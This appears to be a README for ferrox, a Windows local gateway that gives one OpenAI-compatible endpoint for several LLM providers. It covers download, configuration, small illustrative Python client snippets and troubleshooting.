ferrox is a local API gateway for large language model services. It sits between your app and providers like OpenAI, Anthropic, Google Gemini, and AWS Bedrock.
It gives you one OpenAI-style HTTP API surface, so you can point tools and apps at one place instead of changing each provider setup by hand.
It runs on Windows and is built to stay light, fast, and simple to operate.
- Open the ferrox releases page.
- Find the latest release.
- Download the Windows file from the Assets list.
- Save the file to a folder you can reach, such as Downloads or Desktop.
- If the file is a ZIP, extract it first.
- If the file is an EXE, double-click it to run.
- Visit the ferrox releases page and download the latest Windows release.
- If the download is a ZIP file, right-click it and choose Extract All.
- Open the extracted folder.
- Look for the main app file. It may be named `ferrox.exe` or a similar Windows app file.
- Double-click the file to start ferrox.
- If Windows shows a security prompt, choose Run or More info, then Run anyway if you trust the source.
- Keep the app window open while you use it.
If you move the file later, run it from the new folder the same way.
ferrox helps you manage several LLM providers through one gateway. That means:
- one place to send requests
- one API shape for your tools
- less setup for each app
- easier switching between providers
- a simple path for local and team use
It works like a proxy in front of provider APIs. Your apps talk to ferrox, and ferrox talks to the provider you choose.
- connect apps to OpenAI-style endpoints
- route requests to Anthropic, Gemini, or Bedrock
- keep one common API format
- reduce repeated setup in each app
- use a single front door for LLM traffic
- support a setup that can grow across machines
After you open ferrox, set up your provider details in the app or config file used by your release.
Typical setup steps:
- Add your provider API keys.
- Choose the provider you want to use.
- Set the local address ferrox should listen on.
- Save the settings.
- Start the gateway.
- Point your app to the ferrox endpoint.
A common local address may look like:
- `http://localhost:8080`
- `http://127.0.0.1:8080`
If your release uses a config file, place it in the same folder as the app unless the release notes say otherwise.
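As an illustration, such a config file might look like the sketch below. The file name and the field names (`listen`, `provider`, `api_key`) are assumptions for this example; use the keys documented in your release.

```json
{
  "listen": "http://127.0.0.1:8080",
  "provider": "openai",
  "api_key": "YOUR_API_KEY_HERE"
}
```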
ferrox is designed to sit in front of:
- OpenAI
- Anthropic
- Google Gemini
- AWS Bedrock
You can use it as a single entry point and let it handle the provider layer behind the scenes.
Your app sends an OpenAI-compatible request to ferrox.
ferrox checks the request, routes it to the right provider, and returns the response in a format your app can use.
This setup helps when you want:
- one endpoint for many models
- less provider-specific code
- a cleaner setup for local testing
- a small layer between your app and the provider
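The flow above can be sketched with a small Python client. The `/v1/chat/completions` path and the payload shape follow the common OpenAI-style convention; the port and model name are assumptions, not ferrox defaults.

```python
import json
import urllib.request

FERROX_URL = "http://localhost:8080/v1/chat/completions"  # assumed local endpoint

def build_chat_request(model, messages):
    """Build an OpenAI-style chat completion payload."""
    return {"model": model, "messages": messages}

def send_chat_request(payload, url=FERROX_URL):
    """POST the payload to the gateway and return the parsed JSON response."""
    req = urllib.request.Request(
        url,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)

# Build a request; call send_chat_request(payload) once ferrox is running.
payload = build_chat_request(
    "gpt-4o-mini",  # whichever model your configured provider serves
    [{"role": "user", "content": "Hello from ferrox"}],
)
```

Because ferrox forwards to the provider you configured, the same payload works whether the backend is OpenAI, Anthropic, Gemini, or Bedrock.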
For a smooth Windows install, use:
- Windows 10 or Windows 11
- 64-bit system
- Internet access for provider calls
- Enough free disk space for the app and logs
- Permission to run files from your chosen folder
If you use antivirus or corporate security tools, they may ask for approval the first time you run the app.
To keep things simple:
- Create a folder named `ferrox` in your Documents or Desktop folder.
- Put the downloaded file there.
- Extract the ZIP if needed.
- Keep config files in the same folder.
- Leave the app file in place so shortcuts keep working.
A clean folder makes updates and backups easier.
Before you start using ferrox, check these items:
- You downloaded the latest release
- You extracted the files if needed
- You opened the app file from the correct folder
- Your provider API key is saved
- Your app points to the ferrox local address
- Your firewall allows local app traffic if needed
If you have a tool that already works with OpenAI-style APIs, you can change its base URL to ferrox.
Example idea:
- old endpoint: provider API directly
- new endpoint: ferrox local endpoint
Then your tool sends requests to ferrox, and ferrox sends them to the provider you set.
This is useful when you want to switch models without changing every app setting.
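One way to picture the switch: keep the request path, swap the host. The helper below is purely illustrative and assumes ferrox listens on `localhost:8080`.

```python
from urllib.parse import urlsplit, urlunsplit

FERROX_BASE = "http://localhost:8080"  # assumed ferrox address

def point_at_ferrox(provider_url, ferrox_base=FERROX_BASE):
    """Rewrite a provider endpoint so the same request path goes through ferrox."""
    scheme, netloc, *_ = urlsplit(ferrox_base)
    parts = urlsplit(provider_url)
    return urlunsplit((scheme, netloc, parts.path, parts.query, parts.fragment))

old = "https://api.openai.com/v1/chat/completions"
new = point_at_ferrox(old)
# new is "http://localhost:8080/v1/chat/completions"
```

In practice most OpenAI-compatible tools expose a single "base URL" setting, so you usually change one field rather than rewriting URLs in code.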
Open your settings or config file and switch from one provider to another. Keep the same app endpoint.
If you change a key or route, close ferrox and open it again.
If the release includes logs, open them to see request details, startup status, and error messages.
Store API keys only in the config or settings file used by ferrox. Do not paste them into chats or public files.
Your folder may look like this:
```
ferrox.exe
config.json
logs/
README.md
```
Some releases may use a different layout. Use the files included in the release package.
ferrox runs as a local gateway, so Windows may show a network prompt the first time it starts.
If that happens:
- Check that the app name matches ferrox.
- Allow access on your private network if you use it on one machine.
- Keep public network access off unless you need it.
This helps local apps talk to ferrox without trouble.
Use short, clear settings names when you edit config files.
Good habits:
- keep one config backup
- change one setting at a time
- restart after edits
- keep the local port the same if other apps already point to it
If a setting is not clear, try the default value first.
- Check that the file finished downloading
- Extract the ZIP file first if needed
- Right-click the file and choose Run as administrator if your setup needs it
- Make sure Windows did not block the file
- Confirm the local address and port
- Make sure ferrox is still running
- Check the firewall prompt
- Make sure your other app uses the ferrox endpoint, not the original provider endpoint
- Check the API key for typos
- Confirm the correct provider is selected
- Make sure the provider account is active
- Restart ferrox after changes
- Verify the provider service is available
- Check your local network
- Review logs if they are included
- Try a different model or route
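To rule out the "ferrox is not running" case quickly, you can probe the local port before checking anything else. A minimal sketch, assuming port 8080:

```python
import socket

def is_listening(host="127.0.0.1", port=8080, timeout=1.0):
    """Return True if something accepts TCP connections at host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```

If this returns False, start ferrox (or fix the port in your config) before debugging the connecting app.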
When a new release is out:
- Visit the ferrox releases page.
- Download the newest Windows file.
- Close the old app first.
- Replace the old files with the new ones.
- Open the updated app.
- Check your config after the update.
Keep a copy of your config file before replacing anything.
- people who want one LLM API endpoint
- users who switch between providers
- teams that need a shared gateway
- apps that already speak OpenAI-style API
- Windows users who want a local middle layer